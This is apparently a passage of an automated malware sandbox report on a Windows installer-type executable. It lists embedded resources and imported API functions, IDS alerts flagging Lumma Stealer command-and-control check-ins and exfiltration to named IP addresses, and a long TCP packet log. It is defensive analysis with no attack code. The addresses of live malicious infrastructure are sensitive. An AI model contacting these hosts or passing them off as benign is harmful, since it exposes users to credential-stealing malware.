                                                                                                              RT_BITMAP0x1159980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                              RT_ICON0x115a800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                              RT_ICON0x115ba80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                              RT_ICON0x1161100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                              RT_ICON0x1163f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                              RT_STRING0x116ca00xecdata0.6059322033898306
                                                                                                              RT_STRING0x116d8c0x250data0.47466216216216217
                                                                                                              RT_STRING0x116fdc0x28cdata0.4647239263803681
                                                                                                              RT_STRING0x1172680x3e4data0.4347389558232932
                                                                                                              RT_STRING0x11764c0x9cdata0.717948717948718
                                                                                                              RT_STRING0x1176e80xe8data0.6293103448275862
                                                                                                              RT_STRING0x1177d00x468data0.3820921985815603
                                                                                                              RT_STRING0x117c380x38cdata0.3898678414096916
                                                                                                              RT_STRING0x117fc40x3dcdata0.39271255060728744
                                                                                                              RT_STRING0x1183a00x360data0.37037037037037035
                                                                                                              RT_STRING0x1187000x40cdata0.3783783783783784
                                                                                                              RT_STRING0x118b0c0x108data0.5113636363636364
                                                                                                              RT_STRING0x118c140xccdata0.6029411764705882
                                                                                                              RT_STRING0x118ce00x234data0.5070921985815603
                                                                                                              RT_STRING0x118f140x3c8data0.3181818181818182
                                                                                                              RT_STRING0x1192dc0x32cdata0.43349753694581283
                                                                                                              RT_STRING0x1196080x2a0data0.41964285714285715
                                                                                                              RT_RCDATA0x1198a80x82e8dataEnglishUnited States0.11261637622344235
                                                                                                              RT_RCDATA0x121b900x10data1.5
                                                                                                              RT_RCDATA0x121ba00x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                              RT_RCDATA0x1233a00x6bcdata0.6467517401392111
                                                                                                              RT_RCDATA0x123a5c0x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                              RT_RCDATA0x12956c0x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                              RT_RCDATA0x1296940x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                              RT_RCDATA0x129a380x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                              RT_RCDATA0x129d580x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                              RT_RCDATA0x12a0580x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                              RT_RCDATA0x12a6340x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                              RT_RCDATA0x12aa980x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                              RT_GROUP_CURSOR0x12cb2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                              RT_GROUP_CURSOR0x12cb400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                              RT_GROUP_CURSOR0x12cb540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cb680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cb7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cb900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cba40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_ICON0x12cbb80x3edataEnglishUnited States0.8387096774193549
                                                                                                              RT_VERSION0x12cbf80x15cdataEnglishUnited States0.5689655172413793
                                                                                                              RT_MANIFEST0x12cd540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                              advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                              user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                              user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                              msimg32.dllAlphaBlend
                                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                              version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                              mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                              kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                              advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                              comctl32.dllInitCommonControls
                                                                                                              kernel32.dllSleep
                                                                                                              oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                              comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                              shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                              shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                              comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                              ole32.dllCoDisconnectObject
                                                                                                              advapi32.dllAdjustTokenPrivileges
                                                                                                              oleaut32.dllSysFreeString

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-05T18:58:13.957384+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549721104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:14.714158+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549721104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:14.714158+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549721104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:15.214340+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:15.710485+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549722104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:15.710485+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549722104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:16.373395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549723104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:17.512468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549724104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:18.684917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549725104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:20.350470+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549728104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:20.812695+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549728104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:22.150236+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549731104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:23.191474+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549742104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:23.623861+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549742104.21.64.1443TCP
                                                                                                              2025-01-05T18:58:24.491158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549748185.161.251.21443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 5, 2025 18:58:13.490050077 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:13.490073919 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:13.490151882 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:13.491359949 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:13.491373062 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:13.957245111 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:13.957384109 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:13.963208914 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:13.963213921 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:13.963541985 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.010710001 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.010710001 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.010788918 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.714171886 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.714258909 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.714332104 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.717242002 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.717248917 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.717278004 CET49721443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.717283010 CET44349721104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.732553005 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.732578039 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:14.732662916 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.732960939 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:14.732970953 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.214222908 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.214339972 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.215766907 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.215776920 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.216003895 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.217211962 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.217242002 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.217273951 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710479975 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710540056 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710647106 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710669994 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.710683107 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710695028 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710737944 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.710751057 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710792065 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710792065 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.710800886 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.710830927 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.710988998 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.711337090 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.711386919 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.711391926 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.715177059 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.715226889 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.715234995 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.715289116 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.715332031 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.715393066 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.715409040 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.715419054 CET49722443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.715425014 CET44349722104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.917217016 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.917257071 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:15.917368889 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.917726994 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:15.917738914 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.373246908 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.373394966 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.374864101 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.374875069 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.375103951 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.376391888 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.376543999 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.376570940 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.928778887 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.928894997 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.928987980 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.929204941 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.929217100 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.035218000 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.035260916 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.035346031 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.035778046 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.035787106 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.512310982 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.512468100 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.514002085 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.514015913 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.514265060 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.515851021 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.516042948 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.516089916 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.516141891 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.516148090 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.046758890 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.046853065 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.046920061 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.047094107 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.047121048 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.231301069 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.231349945 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.231512070 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.231724024 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.231735945 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.684847116 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.684916973 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.686976910 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.686991930 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.687295914 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.690229893 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.690639019 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.690670013 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.690726042 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.690733910 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.536407948 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.536503077 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.536586046 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.536834002 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.536849022 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.897947073 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.897991896 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.898070097 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.898499012 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.898519039 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.350382090 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.350470066 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.351871967 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.351891994 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.352144957 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.353308916 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.353440046 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.353451014 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.812711000 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.812834024 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.813065052 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.813528061 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.813553095 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:21.658605099 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:21.658658028 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:21.658782005 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:21.659168005 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:21.659178019 CET44349731104.21.64.1192.168.2.5
